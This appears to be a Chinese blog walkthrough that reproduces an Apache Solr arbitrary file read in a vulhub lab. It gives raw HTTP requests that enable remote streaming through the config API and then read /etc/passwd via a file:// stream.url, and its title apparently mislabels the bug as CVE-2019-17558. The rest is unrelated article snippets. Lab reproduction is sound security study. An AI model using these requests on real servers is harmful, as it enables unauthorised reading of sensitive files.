luo_guibin
luo_guibin

Apache Solr <= 8.8.1任意文件读取漏洞复现CVE-2019-17558

一、环境准备

搭建环境vulhub,需要提前安装docker环境

docker安装:docker--安装docker-ce-CSDN博客

vulhub地址:https://github.com/vulhub/vulhub

#创建靶场环境
mkdir /opt/vulhub
cd /opt/vulhub
git https://github.com/vulhub/vulhub.git #git拉取失败请用主机下砸zip上传虚拟机或云服务器
cd /opt/vulhub/vulhub-master/solr/CVE-2019-17558
docker-compose up -d

windows安装jdk环境

下载bp抓包工具

 

二、抓包测试

 获取name信息,如果使用的是

http://*.*.*.*:8983/solr/admin/cores?indexInfo=false&wt=json

Apache Solr <= 8.8.1任意文件读取漏洞复现CVE-2019-17558_第1张图片

name属性为demo 

{
  "responseHeader":{
    "status":0,
    "QTime":0},
  "initFailures":{},
  "status":{
    "demo":{
      "name":"demo",
      "instanceDir":"/var/solr/data/demo",
      "dataDir":"/var/solr/data/demo/data/",
      "config":"solrconfig.xml",
      "schema":"managed-schema",
      "startTime":"2024-01-16T07:46:24.405Z",
      "uptime":165859}}}

打开bp,设置代理,浏览器也要设置,虚拟机设置127.0.0.1,云服务器设置公网IP,端口自定义(默认是8080),bp与浏览器一致即可,另外与本机服务不冲突

Apache Solr <= 8.8.1任意文件读取漏洞复现CVE-2019-17558_第2张图片

判断漏洞是否存在,返回正确说明存在

POST /solr/demo/config HTTP/1.1
Host: *.*.*.*:8983
Content-Length: 92
Connection: close

{
	"set-property":{
		"requestDispatcher.requestParsers.enableRemoteStreaming":true
	}
}

Apache Solr <= 8.8.1任意文件读取漏洞复现CVE-2019-17558_第3张图片

 

三、构造特殊请求包获取敏感数据

构造读取/etc/passwd

POST /solr/demo/./debug/dump?param=ContentStreams HTTP/1.1
Host: *.*.*.*:8983
Content-Length: 29
Content-Type: application/x-www-form-urlencoded
Connection: close

stream.url=file:///etc/passwd

获取成功

Apache Solr <= 8.8.1任意文件读取漏洞复现CVE-2019-17558_第4张图片

你可能感兴趣的:(安全,solr,CVE-2019-17558)

  • python运动物体检测_安全检查中... weixin_39976748 python运动物体检测
    +((!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+(!![])+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]-(!![]))+(!+[]+(!![])+!![]+!![])+(+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![])+(!+[]+(!
  • 什么是开放端口,如何进行开放端口扫描 ManageEngine卓豪 端口扫描网络端口端口扫描端口安全
    近年来网络攻击的增加使IT管理员更加重视网络安全,端口扫描攻击是一种常见的网络攻击类型,黑客利用易受攻击的开放端口渗透到网络中。但是,当网络管理员利用端口扫描时,端口扫描也是一种有效的做法,它可以帮助管理员执行网络监控并识别正在运行的恶意服务,使管理员能够阻止不需要的流量并保护网络端口。开放端口扫描是使用开放端口扫描工具识别和分析网络上开放端口的过程。什么是开放端口开放端口是将TCP或UDP端口号
  • 什么是云安全架构 ManageEngine卓豪 云安全SIEM安全架构云安全云计算云服务
    以保护云环境为目标而创建和实施的策略、技术和实践被称为云安全架构,也被称为云计算安全体系结构,可帮助组织定义安全层、安全规则、最佳实践和其他治理技术,以充分利用其云环境。另一方面,云架构是指以最适合业务需求的方式安排和设计云环境中使用的所有硬件、软件、数据和技术。任何希望采用云的组织都应该规划好自己的云架构和云安全架构。有效的云安全架构可确保组织遵守法规、保护敏感数据,并能够适应不断变化的云威胁形
  • 【学术会议征稿-第二届生成式人工智能与信息安全学术会议(GAIIS 2025)】人工智能与信息安全的魅力 禁默 学术会议人工智能
    重要信息时间:2025年2月21日-23日地点:中国杭州官网:http://www.ic-gaiis.org简介2025年第二届生成式人工智能与信息安全将于2025年2月21日-23日在中国杭州举行。主要围绕“生成式人工智能与信息安全”的最新研究展开,紧密聚焦AI的热点和难点问题,深入剖析信息安全核心技术。生成式人工智能与信息安全的关系主要体现在以下几个方面:数据安全:生成式人工智能通常需要大量的
  • 网络安全知识:网络安全网格架构 ManageEngine卓豪 IAM网络安全CSMA网络安全安全架构IAM
    在数字化转型的主导下,大多数组织利用多云或混合环境,包括本地基础设施、云服务和应用程序以及第三方实体,以及在网络中运行的用户和设备身份。在这种情况下,保护组织资产免受威胁涉及实现一个统一的框架,该框架根据组织内每个实体的上下文提供安全性。此外,强化组合环境需要可互操作的跨域功能,以增强协作,这样就不需要多个解决方案来实现相同的功能。在这种情况下,网络安全网格架构(CSMA)提供了一种可扩展的方法来
  • 园区智能化系统实现管理与服务的智能化转型与创新进阶 快鲸智慧楼宇管理系统 其他
    内容概要园区智能化系统的出现,标志着管理与服务向智能化转型的重要一步。这一系统不仅仅是一个技术解决方案,更是一个全面提升园区运营效率与安全性的独特工具。通过集成大数据分析、物联网和人工智能,园区智能化系统能够为各类园区如工业园、产业园、物流园、写字楼与公寓等提供切实可行的解决方案。“智能化管理不仅是未来的发展趋势,更是提升竞争力的必要手段。”在资产管理方面,智能化系统能够实时监控并优化资源的配置,
  • [车联网安全自学篇] Car Hacking之CAN总线初探 橙留香Park 车联网安全自学篇之CarHacking网络安全渗透测试信息安全
    也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大少走了弯路,也就错过了风景,无论如何,感谢经历0x01前言在汽车制造商不断完善和推进车辆系统的同时,对底层网络的需求进一步增加。为了打造智能汽车,越来越多的零部件在一辆汽车中相互连接。这导致基于标准化技术构建的专用且通常是专有的汽车协议。这些协议中的大多数都基于总线协议:这种总线网络中的所有网络节点都使用单个
  • SSM 校园一卡通密钥管理系统 PF:助力校园信息化建设中的安全基石 2402_85758936 安全java开发语言
    第6章系统测试尽管系统在编码过程中,程序的编制人员也会对编程的功能模块进行逐个测试,但还是避免不了已经组合完成的系统整体没有错误。很多时候,面对功能繁多,逻辑复杂的系统时,系统的测试就需要不同人来测试,并设计一些故障来检验系统的应对能力,以及发现很多系统内部的潜在问题。并通过寻求解决办法去完善系统,确保系统质量。6.1系统测试方法根据系统的测试流程,划分的系统测试方法有单元测试,集成测试,系统测试
  • 安卓安全访问配置说明network-security-config —未来之窗跨平台操作 未来之窗软件服务 android安全java
    一、放行特定的IP地址和端口您要放行的特定IP地址您要放行的端口号二、放行IP段的示例配置192.168.0.0/24true三、放行IP段最后两部分的示例配置      192.168.*.*    true  
  • 【Rust自学】19.1. 摆脱安全性限制的unsafe Rust SomeB1oody Rust自学rust开发语言后端
    喜欢的话别忘了点赞、收藏加关注哦(加关注即可阅读全文),对接下来的教程有兴趣的可以关注专栏。谢谢喵!(=・ω・=)19.1.1.匹配命名变量到目前为止我们讨论的所有代码都在编译时强制执行Rust的内存安全保证。然而,Rust内部隐藏着第二种语言,它不强制执行这些内存安全保证,被称为unsafeRust。它和普通Rust一样,但给了我们额外的“超能力”。unsafeRust之所以存在是因为:静态分析
  • nginx安全配置 凉生ㄨ゛゛记忆﹎ゝ nginx安全chrome
    一、基础安全配置隐藏版本号信息默认情况下,Nginx会在响应头中显示版本号,这可能会给攻击者提供服务器信息。攻击者可以根据版本号查找对应版本的已知漏洞进行定向攻击。http{#关闭在响应头中显示Nginx版本号#默认响应头:Server:nginx/1.18.0#关闭后响应头:Server:nginxserver_tokensoff;}配置安全Headers添加安全相关的HTTP响应头,可以有效防
  • 使用Python批量加密和解密PDF文件 NoABug pdfpython
    使用Python批量加密和解密PDF文件现在,PDF文件已经成为我们日常工作中必不可少的文档格式之一。对于一些重要的PDF文档,我们常常需要加密以保证信息的安全性。但是,手动一个一个加密PDF文件实在是太麻烦了。为了更高效地应对这个问题,我们可以使用Python编写脚本来批量完成PDF文件的加密和解密。首先,我们需要安装PyPDF2库,这个库可以很方便地对PDF文件进行操作,包括加密、解密、合并、
  • 零基础如何学习 Web 安全?_web安全 字节全栈_ZKt 安全学习前端
    随着网络安全行业的快速发展,Web安全也出现在大众视野中,尤其是当Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中将各种应用都架设在Web平台上,于是接踵而至的Web安全威胁逐渐凸显出来,题主零基础学习Web安全,首先需要了解其定义,然后再进行系统化的学习。下面就为题主一一例举如何学习Web安全的学习步骤。一、了解Web安全定义
  • Nginx与Web安全:遵循OWASP最佳实践 墨夶 Nginx学习资料1nginxweb安全hibernate
    在当今数字化时代,网络安全已成为企业不可忽视的重要环节。Web应用程序面临着各种威胁,包括SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。Nginx作为高性能的HTTP和反向代理服务器,提供了丰富的功能来增强Web应用的安全性。结合OpenWebApplicationSecurityProject(OWASP)的最佳实践,可以有效提升Web应用的安全防护水平。本文将详细介绍如何使用
  • Nginx配置Http响应头安全策略_nginx content-security-policy 2301_82257383 程序员nginxhttpokhttp
    server{listen80;server_nameexample.com;location/{add_headerContent-Security-Policy"script-src'self'https://ajax.googleapis.com;";#其他配置...}}3.12style-src指令的参数、说明和示例参数说明示例self只允许从同源加载样式表。style-src'self'
  • 边缘计算与交通管理的协作 AGI大模型与大数据研究院 计算科学神经计算深度学习神经网络大数据人工智能大型语言模型AIAGILLMJavaPython架构设计AgentRPA
    边缘计算与交通管理的协作作者:禅与计算机程序设计艺术/ZenandtheArtofComputerProgramming关键词:边缘计算,交通管理,智能交通系统,数据处理,实时性,安全性,效率1.背景介绍1.1问题的由来随着城市化进程的加快,交通拥堵、能源浪费、环境污染等问题日益突出。传统的交通管理系统往往依赖于中心化的数据处理中心,对实时性、可靠性和处理能力的要求越来越高。然而,随着车联网、智能
  • # 深入解析Lodop底层原理与高级应用开发指南 R.Y.N 前端
    一、Lodop架构深度解析(与常规文档的差异化视角)1.1非对称通信协议设计Lodop采用独特的混合型RPC协议,突破传统打印控件基于HTTP的局限性:二进制协议头:前128字节包含加密的会话标识符和指令类型JSON压缩负载:采用自定义的LZJ压缩算法处理JSON打印指令跨域握手机制:通过动态生成XOR校验码实现跨域安全通信//协议逆向解析示例(模拟)functiondecodeLodopPack
  • 电路研究9.2.6——合宙Air780EP中HTTP——HTTP GET 相关命令使用方法研究 esmember http网络协议网络AT指令
    这个也是一种协议类型:14.16使用方法举例根据之前多种类似的协议的相关信息:HTTP/HTTPS:超文本传输协议(HTTP)用于Web数据的传输,而HTTPS是HTTP的安全版本,使用SSL/TLS进行加密。与FTP相比,HTTP/HTTPS更多用于网页内容的传输,且HTTPS提供了数据加密。这个算网络的相关,我们一般浏览网页用到了呢。所以我们如果用到我需要的设计中,毕竟算下位机跟上位机之间的通
  • C/S架构与B/S架构 嗯嗯= 架构
    一.C/S架构与B/S架构的简述1.1什么是C./S架构C/S架构(Client/ServerArchitecture)是一种软件系统的基本架构模式,客户端负责用户界面和业务逻辑,服务器负责数据存储和处理。C/S架构是一个分布式的计算架构,客户端通过网络连接与服务器通信,完成任务。C/S架构的优点是数据处理效率高,实现灵活,但缺点是维护和安全方面的要求较高,且需要长期维护客户端和服务器。1.2什么
  • Spring 的设计理念之AOP 冰糖心158 SpringFrameworkjava
    Spring框架中的AOP(面向切面编程)是其核心设计理念之一,旨在通过模块化横切关注点(Cross-CuttingConcerns)来提升代码的可维护性和复用性。以下是SpringAOP的设计理念及关键实现细节的总结:1.AOP的核心思想解决横切关注点:将分散在多个模块中的通用功能(如日志、事务、安全等)抽取为独立的切面(Aspect),避免代码重复和耦合。对OOP的补充:AOP并非取代OOP,
  • 一体化运维监控管理平台:产品架构与功能解析 MXsoft618 一体化运维平台一体化监控平台运维管理软件数据库大数据运维
    在当今的信息化时代,运维监控管理平台已成为确保企业IT系统稳定运行不可或缺的工具。本文旨在深入探讨一体化运维监控管理平台的产品架构及其核心功能,以期为运维团队提供有益的参考。随着企业信息化建设的不断深入,IT系统日益复杂,涉及的设备和系统越来越多。传统的分散式监控方式已无法满足现代运维的需求。一体化监控应运而生,它能够集中监控各类IT资源,包括服务器、网络设备、安全设备、数据库等,实现统一的管理和
  • 车联网技术的隐私和数据安全挑战 色宁科技 人工智能人工智能
    引言:随着科技的迅猛发展,车联网技术正逐渐改变着我们的出行方式和交通系统。这项技术将汽车、互联网和通信技术相结合,使车辆能够相互通信、共享数据和连接到外部网络。然而,随之而来的是隐私和数据安全的挑战。本文将探讨车联网技术在隐私保护和数据安全方面所面临的挑战,并提出应对这些挑战的措施。第一部分:车联网技术的隐私挑战车联网技术的发展给我们带来了许多便利,但同时也对个人隐私构成了潜在威胁。以下是一些车联
  • 【java】RuoYi-Vue前后端分离版本-登陆请求流程解析 橙-极纪元JJY.Cheng javaRuoYi-VueRuoYi
    【java】RuoYiBootstrap多模块版本-登陆请求流程解析这里它用到了一个安全管理框架SpringSecurity你可以通过这篇文章《SpringSecurity详解》去了解它,怎么使用登陆请求流程逻辑图CreatedwithRaphaël2.3.0
  • [Linux]el8安全配置faillock:登录失败达阈值自动锁定账户配置 wingaso 运维经验总结linux安全运维ssh
    前言本篇文章的配置仅使用于el8版本的Linux,目前已在centos8、BCLinux8上验证成功,其他版本系统是否可行还得考查。el8中管理用户登录失败锁定账户所用的模块是faillock.so,如果想要将配置应用与其他版本的Linux,建议确认Linux上是否存在faillock模块,并且在配置之前使用同版本的虚拟机进行配置测试,并在正式配置之前进行必要的备份操作。——这个配置的风险可能会远
  • 免费使用Adobe系列软件的Edu教育邮箱及冷门技巧分享 明 庭 adobeazurephotoshop
    在数字创意领域,Adobe系列软件因其强大的功能而备受推崇。持有Edu教育邮箱的用户可以免费获取这些软件,避免使用存在诸多问题的破解版,确保使用体验的稳定与安全。若您想了解如何申请Edu邮箱,建议查阅相关资料以获取详细信息。本文将分享五个冷门的Adobe系列软件小技巧,帮助您更高效地使用这些工具。1.Photoshop的智能对象在Photoshop中,将图层转换为智能对象,可以随时编辑其内容而不影
  • Spring框架AOP基本使用指南 未来并未来 springjava后端
    AOP(Aspect-OrientedProgramming,面向切面编程)是Spring框架中的一个重要特性,它允许开发者将横切关注点(如日志记录、事务管理、安全性等)从业务逻辑中分离出来,从而提高代码的模块化和可维护性。本文将详细介绍Spring框架中AOP的基本使用,包括如何定义切面、通知、切点以及如何在Spring应用中配置AOP。1.AOP基本概念在开始使用SpringAOP之前,我们需
  • 守护每一比特的安全——探索基于差分隐私的MySQL数据脱敏之道 墨夶 数据库学习资料2安全mysql数据库
    在当今数字化时代,随着互联网和大数据技术的发展,数据的价值愈发凸显。然而,随之而来的个人隐私泄露风险也日益增加,成为社会广泛关注的问题之一。特别是在医疗、金融等领域,如何既能充分利用海量数据资源推动行业发展,又能有效保护用户隐私不被侵犯,成为了亟待解决的重要课题。本文将深入探讨一种创新的数据安全共享方案——基于差分隐私(DifferentialPrivacy,DP)的MySQL数据库实现方法,旨在
  • 并发编程 - 线程同步 快乐非自愿 javajvm开发语言
    经过前面对线程的尝试使用,我们对线程的了解又进一步加深了。今天我们继续来深入学习线程的新知识——线程同步。01、什么是线程同步线程同步是指在多线程环境下,确保多个线程在同时使用共享资源时不会发生冲突或数据不一致问题的技术,保证线程间的正确协作。它的目的是使得多个线程在执行过程中能够按照某种顺序、安全地使用共享资源。02、为何需要线程同步1、避免竞争条件不知道大家还记得在《并发编程-初识线程》中出现
  • 分布式系统架构7:本地缓存 快乐非自愿 架构缓存
    1.引入缓存的影响我们在开发时,用到缓存的情况,无非就是为了减少客户端对相同资源的重复请求,降低服务器的负载压力。引入缓存后,既有好处也有坏处引入缓存负面影响:开发角度,增加了系统复杂度,需考虑缓存失效、更新、一致性问题运维角度,缓存会掩盖一些缺陷问题安全角度,缓存可能泄密某些保密数据引入缓存的理由:为了缓解CPU压力,将实时计算运行结果存储起来,节省CPU压力为了缓解I/O压力,将原本对网络、磁
  • 《DeepSeek-R1 问世,智能搜索领域迎来新变革》 黑金IT 智能搜索
    DeepSeek-R1是由DeepSeek公司开发的一款创新型人工智能模型,自2024年5月7日发布以来,迅速在AI领域引起广泛关注。该模型凭借其卓越的语言理解能力、高效的数据处理能力、自适应学习能力、高安全性与可靠性以及广泛的应用场景与拓展性,在众多人工智能模型中脱颖而出。DeepSeek-R1的核心特点强大的语言理解能力:DeepSeek-R1采用先进的深度学习算法,能够精准解析复杂的语义结构
  • Dom 周华华 JavaScripthtml
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • 【Spark九十六】RDD API之combineByKey bit1129 spark
    1. combineByKey函数的运行机制   RDD提供了很多针对元素类型为(K,V)的API,这些API封装在PairRDDFunctions类中,通过Scala隐式转换使用。这些API实现上是借助于combineByKey实现的。combineByKey函数本身也是RDD开放给Spark开发人员使用的API之一   首先看一下combineByKey的方法说明:
  • msyql设置密码报错:ERROR 1372 (HY000): 解决方法详解 daizj mysql设置密码
    MySql给用户设置权限同时指定访问密码时,会提示如下错误: ERROR 1372 (HY000): Password hash should be a 41-digit hexadecimal number;   问题原因:你输入的密码是明文。不允许这么输入。   解决办法:用select password('你想输入的密码');查询出你的密码对应的字符串, 然后
  • 路漫漫其修远兮 吾将上下而求索 周凡杨 学习 思索
    王国维在他的《人间词话》中曾经概括了为学的三种境界古今之成大事业、大学问者,罔不经过三种之境界。“昨夜西风凋碧树。独上高楼,望尽天涯路。”此第一境界也。“衣带渐宽终不悔,为伊消得人憔悴。”此第二境界也。“众里寻他千百度,蓦然回首,那人却在灯火阑珊处。”此第三境界也。学习技术,这也是你必须经历的三种境界。第一层境界是说,学习的路是漫漫的,你必须做好充分的思想准备,如果半途而废还不如不要开始。这里,注
  • Hadoop(二)对话单的操作 朱辉辉33 hadoop
    Debug: 1、 A = LOAD '/user/hue/task.txt' USING PigStorage(' ') AS (col1,col2,col3); DUMP A; //输出结果前几行示例: (>ggsnPDPRecord(21),,) (-->recordType(0),,) (-->networkInitiation(1),,)
  • web报表工具FineReport常用函数的用法总结(日期和时间函数) 老A不折腾 finereport报表工具web开发
    web报表工具FineReport常用函数的用法总结(日期和时间函数)   说明:凡函数中以日期作为参数因子的,其中日期的形式都必须是yy/mm/dd。而且必须用英文环境下双引号(" ")引用。   DATE DATE(year,month,day):返回一个表示某一特定日期的系列数。 Year:代表年,可为一到四位数。 Month:代表月份。
  • c++ 宏定义中的##操作符 墙头上一根草 C++
    #与##在宏定义中的--宏展开 #include <stdio.h> #define f(a,b) a##b #define g(a)   #a #define h(a) g(a) int main() {       &nbs
  • 分析Spring源代码之,DI的实现 aijuans springDI源代码
    (转) 分析Spring源代码之,DI的实现 2012/1/3 by tony                 接着上次的讲,以下这个sample [java]  view plain copy print
  • for循环的进化 alxw4616 JavaScript
    // for循环的进化 // 菜鸟 for (var i = 0; i < Things.length ; i++) { // Things[i] } // 老鸟 for (var i = 0, len = Things.length; i < len; i++) { // Things[i] } // 大师 for (var i = Things.le
  • 网络编程Socket和ServerSocket简单的使用 百合不是茶 网络编程基础IP地址端口
      网络编程;TCP/IP协议   网络:实现计算机之间的信息共享,数据资源的交换   协议:数据交换需要遵守的一种协议,按照约定的数据格式等写出去   端口:用于计算机之间的通信      每运行一个程序,系统会分配一个编号给该程序,作为和外界交换数据的唯一标识 0~65535   查看被使用的
  • JDK1.5 生产消费者 bijian1013 javathread生产消费者java多线程
    ArrayBlockingQueue:        一个由数组支持的有界阻塞队列。此队列按 FIFO(先进先出)原则对元素进行排序。队列的头部 是在队列中存在时间最长的元素。队列的尾部 是在队列中存在时间最短的元素。新元素插入到队列的尾部,队列检索操作则是从队列头部开始获得元素。 ArrayBlockingQueue的常用方法:
  • JAVA版身份证获取性别、出生日期及年龄 bijian1013 java性别出生日期年龄
            工作中需要根据身份证获取性别、出生日期及年龄,且要还要支持15位长度的身份证号码,网上搜索了一下,经过测试好像多少存在点问题,干脆自已写一个。 CertificateNo.java package com.bijian.study; import java.util.Calendar; import
  • 【Java范型六】范型与枚举 bit1129 java
    首先,枚举类型的定义不能带有类型参数,所以,不能把枚举类型定义为范型枚举类,例如下面的枚举类定义是有编译错的   public enum EnumGenerics<T> { //编译错,提示枚举不能带有范型参数 OK, ERROR; public <T> T get(T type) { return null;
  • 【Nginx五】Nginx常用日志格式含义 bit1129 nginx
    1. log_format 1.1 log_format指令用于指定日志的格式,格式:   log_format name(格式名称) type(格式样式)   1.2 如下是一个常用的Nginx日志格式:   log_format main '[$time_local]|$request_time|$status|$body_bytes
  • Lua 语言 15 分钟快速入门 ronin47 lua 基础
    - - 单行注释 - - [[      [多行注释] - - ]]   - - - - - - - - - - - 1. 变量 & 控制流 - - - - - - - - - - num = 23 - - 数字都是双精度 str = 'aspythonstring'
  • java-35.求一个矩阵中最大的二维矩阵 ( 元素和最大 ) bylijinnan java
    the idea is from: http://blog.csdn.net/zhanxinhang/article/details/6731134 public class MaxSubMatrix { /**see http://blog.csdn.net/zhanxinhang/article/details/6731134 * Q35 求一个矩阵中最大的二维
  • mongoDB文档型数据库特点 开窍的石头 mongoDB文档型数据库特点
    MongoDD: 文档型数据库存储的是Bson文档-->json的二进制 特点:内部是执行引擎是js解释器,把文档转成Bson结构,在查询时转换成js对象。 mongoDB传统型数据库对比    传统类型数据库:结构化数据,定好了表结构后每一个内容符合表结构的。也就是说每一行每一列的数据都是一样的    文档型数据库:不用定好数据结构,
  • [毕业季节]欢迎广大毕业生加入JAVA程序员的行列 comsci java
        一年一度的毕业季来临了。。。。。。。。      正在投简历的学弟学妹们。。。如果觉得学校推荐的单位和公司不适合自己的兴趣和专业,可以考虑来我们软件行业,做一名职业程序员。。。      软件行业的开发工具中,对初学者最友好的就是JAVA语言了,网络上不仅仅有大量的
  • PHP操作Excel – PHPExcel 基本用法详解 cuiyadll PHPExcel
    导出excel属性设置//Include classrequire_once('Classes/PHPExcel.php');require_once('Classes/PHPExcel/Writer/Excel2007.php');$objPHPExcel = new PHPExcel();//Set properties 设置文件属性$objPHPExcel->getProperties
  • IBM Webshpere MQ Client User Issue (MCAUSER) darrenzhu IBMjmsuserMQMCAUSER
    IBM MQ JMS Client去连接远端MQ Server的时候,需要提供User和Password吗? 答案是根据情况而定,取决于所定义的Channel里面的属性Message channel agent user identifier (MCAUSER)的设置。 http://stackoverflow.com/questions/20209429/how-mca-user-i
  • 网线的接法 dcj3sjt126com
    一、PC连HUB (直连线)A端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 二、PC连PC (交叉线)A端:(568A): 白绿,绿,白橙,蓝,白蓝,橙,白棕,棕; B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 三、HUB连HUB&nb
  • Vimium插件让键盘党像操作Vim一样操作Chrome dcj3sjt126com chromevim
    什么是键盘党? 键盘党是指尽可能将所有电脑操作用键盘来完成,而不去动鼠标的人。鼠标应该说是新手们的最爱,很直观,指哪点哪,很听话!不过常常使用电脑的人,如果一直使用鼠标的话,手会发酸,因为操作鼠标的时候,手臂不是在一个自然的状态,臂肌会处于绷紧状态。而使用键盘则双手是放松状态,只有手指在动。而且尽量少的从鼠标移动到键盘来回操作,也省不少事。 在chrome里安装 vimium 插件
  • MongoDB查询(2)——数组查询[六] eksliang mongodbMongoDB查询数组
    MongoDB查询数组 转载请出自出处:http://eksliang.iteye.com/blog/2177292 一、概述  MongoDB查询数组与查询标量值是一样的,例如,有一个水果列表,如下所示: > db.food.find() { "_id" : "001", "fruits" : [ "苹
  • cordova读写文件(1) gundumw100 JavaScriptCordova
    使用cordova可以很方便的在手机sdcard中读写文件。 首先需要安装cordova插件:file 命令为: cordova plugin add org.apache.cordova.file 然后就可以读写文件了,这里我先是写入一个文件,具体的JS代码为: var datas=null;//datas need write var directory=&
  • HTML5 FormData 进行文件jquery ajax 上传 到又拍云 ileson jqueryAjaxhtml5FormData
    html5 新东西:FormData  可以提交二进制数据。 页面test.html <!DOCTYPE> <html> <head> <title> formdata file jquery ajax upload</title> </head> <body> <
  • swift appearanceWhenContainedIn:(version1.2 xcode6.4) 啸笑天 version
      swift1.2中没有oc中对应的方法: + (instancetype)appearanceWhenContainedIn:(Class <UIAppearanceContainer>)ContainerClass, ... NS_REQUIRES_NIL_TERMINATION;  解决方法: 在swift项目中新建oc类如下: #import &
  • java实现SMTP邮件服务器 macroli java编程
    电子邮件传递可以由多种协议来实现。目前,在Internet 网上最流行的三种电子邮件协议是SMTP、POP3 和 IMAP,下面分别简单介绍。   ◆ SMTP 协议   简单邮件传输协议(Simple Mail Transfer Protocol,SMTP)是一个运行在TCP/IP之上的协议,用它发送和接收电子邮件。SMTP 服务器在默认端口25上监听。SMTP客户使用一组简单的、基于文本的
  • mongodb group by having where 查询sql qiaolevip 每天进步一点点学习永无止境mongo纵观千象
    SELECT cust_id, SUM(price) as total FROM orders WHERE status = 'A' GROUP BY cust_id HAVING total > 250 db.orders.aggregate( [ { $match: { status: 'A' } }, { $group: {
  • Struts2 Pojo(六) Luob. POJOstrust2
    注意:附件中有完整案例 1.采用POJO对象的方法进行赋值和传值 2.web配置 <?xml version="1.0" encoding="UTF-8"?> <web-app version="2.5" xmlns="http://java.sun.com/xml/ns/javaee&q
  • struts2步骤 wuai struts
    1、添加jar包 2、在web.xml中配置过滤器 <filter>        <filter-name>struts2</filter-name>        <filter-class>org.apache.st
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他